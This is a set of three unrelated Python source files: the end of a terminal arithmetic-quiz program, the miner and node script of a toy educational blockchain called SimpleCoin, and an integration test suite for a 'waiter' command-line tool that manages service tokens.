result = random.randint(lower1,upper1)
p_m = random.randint(0,1)
if p_m == 0:
x2 = random.randint(lower2,upper2)
x1 = result + x2
else:
x2 = random.randint(lower2,result)
x1 = result - x2
qstr0 = str(x1) +" "+ signchar[p_m] +" "+ str(x2) +" = "
qstr = "\x1b["+str(3+y0)+";"+str(3+x0)+"H"+ qstr0 + "\x1b[K\x1b[?25h"
else:
x1 = random.randint(lower1,upper1)
x2 = random.randint(lower2,upper2)
if q_type == 1:
p_m = 1
elif q_type == 2:
p_m = 0
elif q_type == 3:
p_m = random.randint(0,1)
else:
p_m = 1 - p_m
if p_m == 0:
if x1 < x2:
tv = x1
x1 = x2
x2 = tv
result = x1 - x2
else:
result = x1 + x2
qstr0 = str(x1) +" "+ signchar[p_m] +" "+ str(x2) +" = "
qstr = "\x1b["+str(3+y0)+";"+str(3+x0)+"H"+ qstr0 + "\x1b[K\x1b[?25h"
# }}}
t0 = datetime.datetime.now ()
with lock:
sys.stdout.write (qstr) # clear line, show cursor
sys.stdout.flush ()
# Input processing loop {{{
while True:
# Read 1 character
newchar = sys.stdin.read(1)
if newchar == 'Q': # immediately quit
sys.exit ()
elif newchar == ' ': # toggle pause
if sec_inc == 0:
myclrline (1,5)
sec_inc = 1
else:
myaddstr (1,5,"PAUSED")
sec_inc = 0
elif inplen<8 and newchar>='0' and newchar<='9':
inpstr[inplen] = newchar
inplen = inplen + 1
with lock:
sys.stdout.write (newchar)
sys.stdout.flush ()
elif inplen>0:
#logging.debug("Main : unknown character"+str(ord(newchar)))
if ord(newchar) == 13: # ENTER
break
elif ord(newchar) == 127: # BACKSPACE
inplen = inplen - 1
with lock:
sys.stdout.write ("\x1b[D\x1b[K")
sys.stdout.flush ()
# END input processing loop}}}
logging.debug (inpstr)
ansstr = s.join(inpstr[0:inplen])
ans = int(ansstr)
if ans == result:
myaddstr(5, 3, "\x1b[32mCORRECT!\x1b[m");
c_right = c_right + 1
markchar = ' '
else:
myaddstr(5, 3, "\x1b[91mWRONG! \x1b[m");
c_wrong = c_wrong + 1
markchar = '@'
td = datetime.datetime.now() - t0
flog.write( "%1s %3d %s\n" % (markchar,int(td.total_seconds()),qstr0+ansstr) )
newchar = sys.stdin.read(1)
myclrline (5,3);
myaddstr_m ((( 8,10,str(c_right)),
( 9,10,str(c_wrong))));
# END question loop }}}
newchar = sys.stdin.read(1)
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
# Keep incrementing the incrementer until it's equal to a number divisible by 9
# and the proof of work of the previous block in the chain
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
# Check if any node found the solution every 60 seconds
if int((time.time()-start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
In order to prevent too many coins to be created, the process
is slowed down by a proof of work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(url = MINER_NODE_URL + '/txion', params = {'update':MINER_ADDRESS}).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": str(new_block_timestamp),
"data": new_block_data,
"hash": last_block_hash
}, sort_keys=True) + "\n")
a.send(BLOCKCHAIN)
requests.get(url = MINER_NODE_URL + '/blocks', params = {'update':MINER_ADDRESS})
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(url = node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
"""Validate the submitted chain. If hashes are not correct, return false
block(str): json
"""
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json, sort_keys=True)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
coins, they don't create it.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS, sort_keys=True)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
# Try changing into an if/else statement as except is too broad.
try:
return vk.verify(signature, message.encode())
except:
return False
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
Make sure you are using the latest version or you may end in
a parallel chain.\n\n\n""")
if __name__ == '__main__':
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
p2 = Process(target=node.run(), args=b)
p2.start()
|
test_cli.py
|
import datetime
import getpass
import json
import logging
import os
import re
import tempfile
import threading
import unittest
import uuid
from functools import partial
import pytest
from tests.waiter import util, cli
@pytest.mark.cli
@pytest.mark.timeout(util.DEFAULT_TEST_TIMEOUT_SECS)
class WaiterCliTest(util.WaiterTest):
@classmethod
def setUpClass(cls):
cls.waiter_url = util.retrieve_waiter_url()
util.init_waiter_session(cls.waiter_url)
cli.write_base_config()
def setUp(self):
self.waiter_url = type(self).waiter_url
self.logger = logging.getLogger(__name__)
def test_basic_create(self):
token_name = self.token_name()
version = str(uuid.uuid4())
cmd = util.minimal_service_cmd()
cp = cli.create_minimal(self.waiter_url, token_name, flags=None, cmd=cmd, cpus=0.1, mem=128, version=version)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
self.assertIn('Attempting to create', cli.stdout(cp))
token_data = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token_data)
self.assertEqual('shell', token_data['cmd-type'])
self.assertEqual(cmd, token_data['cmd'])
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual(getpass.getuser(), token_data['owner'])
self.assertEqual(getpass.getuser(), token_data['last-update-user'])
self.assertEqual({}, token_data['previous'])
self.assertEqual(version, token_data['version'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_basic_update(self):
token_name = self.token_name()
version = str(uuid.uuid4())
cmd = util.minimal_service_cmd()
cp = cli.update_minimal(self.waiter_url, token_name, flags=None, cmd=cmd, cpus=0.1, mem=128, version=version)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
self.assertIn('Attempting to update', cli.stdout(cp))
token_data = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token_data)
self.assertEqual('shell', token_data['cmd-type'])
self.assertEqual(cmd, token_data['cmd'])
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual(getpass.getuser(), token_data['owner'])
self.assertEqual(getpass.getuser(), token_data['last-update-user'])
self.assertEqual({}, token_data['previous'])
self.assertEqual(version, token_data['version'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_failed_create(self):
service = util.minimal_service_description(cpus=0)
cp = cli.create_from_service_description(self.waiter_url, self.token_name(), service)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Service description', cli.decode(cp.stderr))
self.assertIn('improper', cli.decode(cp.stderr))
self.assertIn('cpus must be a positive number', cli.decode(cp.stderr))
def __test_no_cluster(self, cli_fn):
config = {'clusters': []}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli_fn(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify at least one cluster', cli.decode(cp.stderr))
def test_create_no_cluster(self):
self.__test_no_cluster(cli.create_minimal)
def test_unspecified_create_cluster(self):
config = {
'clusters': [
{"name": "Foo", "url": self.waiter_url},
{"name": "Bar", "url": self.waiter_url}
]
}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli.create_minimal(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must either specify a cluster via --cluster or set "default-for-create" to true',
cli.decode(cp.stderr))
def test_over_specified_create_cluster(self):
config = {
'clusters': [
{"name": "Foo", "url": self.waiter_url, "default-for-create": True},
{"name": "Bar", "url": self.waiter_url, "default-for-create": True}
]
}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli.create_minimal(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('have "default-for-create" set to true for more than one cluster', cli.decode(cp.stderr))
def test_single_specified_create_cluster(self):
config = {
'clusters': [
{"name": "Foo", "url": str(uuid.uuid4())},
{"name": "Bar", "url": self.waiter_url, "default-for-create": True}
]
}
with cli.temp_config_file(config) as path:
token_name = self.token_name()
flags = '--config %s' % path
cp = cli.create_minimal(token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token)
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_single_cluster(self):
config = {'clusters': [{"name": "Bar", "url": self.waiter_url}]}
with cli.temp_config_file(config) as path:
token_name = self.token_name()
flags = '--config %s' % path
cp = cli.create_minimal(token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token)
finally:
util.delete_token(self.waiter_url, token_name)
def test_implicit_create_args(self):
cp = cli.create(create_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('--cpus', cli.stdout(cp))
self.assertNotIn('--https-redirect', cli.stdout(cp))
self.assertNotIn('--fallback-period-secs', cli.stdout(cp))
self.assertNotIn('--idle-timeout-mins', cli.stdout(cp))
self.assertNotIn('--max-instances', cli.stdout(cp))
self.assertNotIn('--restart-backoff-factor', cli.stdout(cp))
self.assertNotIn('--health-check-port-index', cli.stdout(cp))
self.assertNotIn('--concurrency-level', cli.stdout(cp))
self.assertNotIn('--health-check-max-consecutive-failures', cli.stdout(cp))
self.assertNotIn('--max-queue-length', cli.stdout(cp))
self.assertNotIn('--expired-instance-restart-rate', cli.stdout(cp))
self.assertNotIn('--jitter-threshold', cli.stdout(cp))
token_name = self.token_name()
cp = cli.create(self.waiter_url, token_name, create_flags=('--https-redirect true '
'--cpus 0.1 '
'--fallback-period-secs 10 '
'--idle-timeout-mins 1 '
'--max-instances 100 '
'--restart-backoff-factor 1.1 '
'--health-check-port-index 1 '
'--concurrency-level 1000 '
'--health-check-max-consecutive-failures 10 '
'--max-queue-length 1000000 '
'--expired-instance-restart-rate 0.1 '
'--jitter-threshold 0.1 '))
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertTrue(token['https-redirect'])
self.assertEqual(10, token['fallback-period-secs'])
self.assertEqual(1, token['idle-timeout-mins'])
self.assertEqual(100, token['max-instances'])
self.assertEqual(1.1, token['restart-backoff-factor'])
self.assertEqual(1, token['health-check-port-index'])
self.assertEqual(1000, token['concurrency-level'])
self.assertEqual(10, token['health-check-max-consecutive-failures'])
self.assertEqual(1000000, token['max-queue-length'])
self.assertEqual(0.1, token['expired-instance-restart-rate'])
self.assertEqual(0.1, token['jitter-threshold'])
cp = cli.create(self.waiter_url, token_name, create_flags=('--https-redirect false '
'--cpus 0.1 '
'--fallback-period-secs 20 '
'--idle-timeout-mins 2 '
'--max-instances 200 '
'--restart-backoff-factor 2.2 '
'--health-check-port-index 2 '
'--concurrency-level 2000 '
'--health-check-max-consecutive-failures 2 '
'--max-queue-length 2000000 '
'--expired-instance-restart-rate 0.2 '
'--jitter-threshold 0.2 '))
self.assertEqual(0, cp.returncode, cp.stderr)
token = util.load_token(self.waiter_url, token_name)
self.assertFalse(token['https-redirect'])
self.assertEqual(20, token['fallback-period-secs'])
self.assertEqual(2, token['idle-timeout-mins'])
self.assertEqual(200, token['max-instances'])
self.assertEqual(2.2, token['restart-backoff-factor'])
self.assertEqual(2, token['health-check-port-index'])
self.assertEqual(2000, token['concurrency-level'])
self.assertEqual(2, token['health-check-max-consecutive-failures'])
self.assertEqual(2000000, token['max-queue-length'])
self.assertEqual(0.2, token['expired-instance-restart-rate'])
self.assertEqual(0.2, token['jitter-threshold'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_help_text(self):
cp = cli.create(create_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('memory (in MiB) to reserve', cli.stdout(cp))
def test_cli_invalid_file_format_combo(self):
cp = cli.create(self.waiter_url, create_flags='--json test.json --yaml test.yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
cp = cli.update(self.waiter_url, update_flags='--json test.json --yaml test.yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
token_name = self.token_name()
cp = cli.show(self.waiter_url, token_name, show_flags='--json --yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
token_name = self.token_name()
cp = cli.show(self.waiter_url, token_name, show_flags='--json --yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
cp = cli.tokens(self.waiter_url, tokens_flags='--json --yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
def test_implicit_update_args(self):
cp = cli.create(create_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('--cpus', cli.stdout(cp))
self.assertNotIn('--https-redirect', cli.stdout(cp))
self.assertNotIn('--fallback-period-secs', cli.stdout(cp))
self.assertNotIn('--idle-timeout-mins', cli.stdout(cp))
self.assertNotIn('--max-instances', cli.stdout(cp))
self.assertNotIn('--restart-backoff-factor', cli.stdout(cp))
token_name = self.token_name()
cp = cli.update(self.waiter_url, token_name, update_flags='--https-redirect true '
'--cpus 0.1 '
'--fallback-period-secs 10 '
'--idle-timeout-mins 1 '
'--max-instances 100 '
'--restart-backoff-factor 1.1')
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertTrue(token['https-redirect'])
self.assertEqual(10, token['fallback-period-secs'])
self.assertEqual(1, token['idle-timeout-mins'])
self.assertEqual(100, token['max-instances'])
self.assertEqual(1.1, token['restart-backoff-factor'])
cp = cli.update(self.waiter_url, token_name, update_flags='--https-redirect false '
'--cpus 0.1 '
'--fallback-period-secs 20 '
'--idle-timeout-mins 2 '
'--max-instances 200 '
'--restart-backoff-factor 2.2')
self.assertEqual(0, cp.returncode, cp.stderr)
token = util.load_token(self.waiter_url, token_name)
self.assertFalse(token['https-redirect'])
self.assertEqual(20, token['fallback-period-secs'])
self.assertEqual(2, token['idle-timeout-mins'])
self.assertEqual(200, token['max-instances'])
self.assertEqual(2.2, token['restart-backoff-factor'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_basic_show(self):
token_name = self.token_name()
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
token_definition = {
'cmd-type': 'shell',
'health-check-url': '/foo',
'min-instances': 1,
'max-instances': 2,
'permitted-user': '*',
'mem': 1024
}
util.post_token(self.waiter_url, token_name, token_definition)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token)
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Command type', cli.stdout(cp))
self.assertIn('Health check endpoint', cli.stdout(cp))
self.assertIn('Minimum instances', cli.stdout(cp))
self.assertIn('Maximum instances', cli.stdout(cp))
self.assertIn('Permitted user(s)', cli.stdout(cp))
self.assertIn(f'=== {self.waiter_url} / {token_name} ===', cli.stdout(cp))
self.assertIn('1 GiB', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_implicit_show_fields(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'https-redirect': True, 'fallback-period-secs': 10})
try:
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Https redirect', cli.stdout(cp))
self.assertIn('Fallback period (seconds)', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_show_no_cluster(self):
config = {'clusters': []}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli.show(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify at least one cluster', cli.decode(cp.stderr))
def __test_show(self, file_format):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp, tokens = cli.show_token(file_format, self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(tokens))
self.assertEqual(util.load_token(self.waiter_url, token_name), tokens[0])
finally:
util.delete_token(self.waiter_url, token_name)
def test_show_json(self):
self.__test_show('json')
def test_show_yaml(self):
self.__test_show('yaml')
@pytest.mark.serial
def test_create_if_match(self):
def encountered_stale_token_error(cp):
self.logger.info(f'Return code: {cp.returncode}, output: {cli.output(cp)}')
assert 1 == cp.returncode
assert 'stale token' in cli.decode(cp.stderr)
return True
token_name = self.token_name()
keep_running = True
def update_token_loop():
mem = 1
while keep_running:
util.post_token(self.waiter_url, token_name, {'mem': mem}, assert_response=False)
mem += 1
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
thread = threading.Thread(target=update_token_loop)
try:
thread.start()
util.wait_until(lambda: cli.create_minimal(self.waiter_url, token_name),
encountered_stale_token_error,
wait_interval_ms=0)
finally:
keep_running = False
thread.join()
self.logger.info('Thread finished')
util.delete_token(self.waiter_url, token_name)
@unittest.skipIf('WAITER_TEST_CLI_COMMAND' in os.environ, 'waiter executable may be unknown.')
def test_base_config_file(self):
token_name = self.token_name()
cluster_name_1 = str(uuid.uuid4())
config = {'clusters': [{"name": cluster_name_1, "url": self.waiter_url}]}
with cli.temp_base_config_file(config):
# Use entry in base config file
cp = cli.create_minimal(token_name=token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
self.assertIn(f'on {cluster_name_1}', cli.decode(cp.stdout))
# Overwrite "base" with specified config file
cluster_name_2 = str(uuid.uuid4())
config = {'clusters': [{"name": cluster_name_2, "url": self.waiter_url}]}
with cli.temp_config_file(config) as path:
# Verify "base" config is overwritten
flags = '--config %s' % path
cp = cli.create_minimal(token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'on {cluster_name_2}', cli.decode(cp.stdout))
finally:
util.delete_token(self.waiter_url, token_name)
def test_avoid_exit_on_connection_error(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
config = {'clusters': [{'name': 'foo', 'url': self.waiter_url},
{'name': 'bar', 'url': 'http://localhost:65535'}]}
with cli.temp_config_file(config) as path:
flags = f'--config {path}'
cp, tokens = cli.show_token('json', token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(tokens), tokens)
self.assertEqual(util.load_token(self.waiter_url, token_name), tokens[0])
self.assertIn('Encountered connection error with bar', cli.decode(cp.stderr), cli.output(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_show_env(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'env': {'FOO': '1', 'BAR': 'baz'}})
try:
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Environment:\n', cli.stdout(cp))
self.assertNotIn('Env ', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_delete_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Deleting token', cli.stdout(cp))
self.assertIn('Successfully deleted', cli.stdout(cp))
resp_json = util.load_token(self.waiter_url, token_name, expected_status_code=404)
self.assertIn('waiter-error', resp_json)
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_delete_single_service(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
self.logger.info(f'Token: {util.load_token(self.waiter_url, token_name)}')
service_id = util.ping_token(self.waiter_url, token_name)
try:
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cli.output(cp))
self.assertIn('There is one service using token', cli.stderr(cp))
self.assertIn('Please kill this service before deleting the token', cli.stderr(cp))
self.assertIn(service_id, cli.stderr(cp))
finally:
util.kill_service(self.waiter_url, service_id)
finally:
util.delete_token(self.waiter_url, token_name)
def test_delete_multiple_services(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
self.logger.info(f'Token: {util.load_token(self.waiter_url, token_name)}')
service_id_1 = util.ping_token(self.waiter_url, token_name)
try:
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
self.logger.info(f'Token: {util.load_token(self.waiter_url, token_name)}')
service_id_2 = util.ping_token(self.waiter_url, token_name)
try:
services_for_token = util.services_for_token(self.waiter_url, token_name)
self.logger.info(f'Services for token {token_name}: {json.dumps(services_for_token, indent=2)}')
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cli.output(cp))
self.assertIn('There are 2 services using token', cli.stderr(cp))
self.assertIn('Please kill these services before deleting the token', cli.stderr(cp))
self.assertIn(service_id_1, cli.stderr(cp))
self.assertIn(service_id_2, cli.stderr(cp))
finally:
util.kill_service(self.waiter_url, service_id_2)
finally:
util.kill_service(self.waiter_url, service_id_1)
finally:
util.delete_token(self.waiter_url, token_name)
@pytest.mark.serial
def test_delete_if_match(self):
def encountered_stale_token_error(cp):
self.logger.info(f'Return code: {cp.returncode}, output: {cli.output(cp)}')
assert 1 == cp.returncode
assert 'stale token' in cli.decode(cp.stderr)
return True
token_name = self.token_name()
keep_running = True
def update_token_loop():
mem = 1
while keep_running:
util.post_token(self.waiter_url, token_name, {'mem': mem}, assert_response=False)
mem += 1
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
thread = threading.Thread(target=update_token_loop)
try:
thread.start()
util.wait_until(lambda: cli.delete(self.waiter_url, token_name),
encountered_stale_token_error,
wait_interval_ms=0)
finally:
keep_running = False
thread.join()
self.logger.info('Thread finished')
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_delete_non_existent_token(self):
token_name = self.token_name()
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ping_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('successful', cli.stdout(cp))
self.assertIn('Service is currently', cli.stdout(cp))
self.assertTrue(any(s in cli.stdout(cp) for s in ['Running', 'Starting']))
util.wait_until_services_for_token(self.waiter_url, token_name, 1)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_error(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_non_existent_token(self):
token_name = self.token_name()
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ping_custom_health_check_endpoint(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description(**{'health-check-url': '/sleep'}))
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, flags="-v")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertIn(service_id, cli.stdout(cp))
self.assertIn('Successfully killed', cli.stdout(cp))
self.assertIn('timeout=30000', cli.stderr(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_token_and_then_ping(self):
token_name = self.token_name()
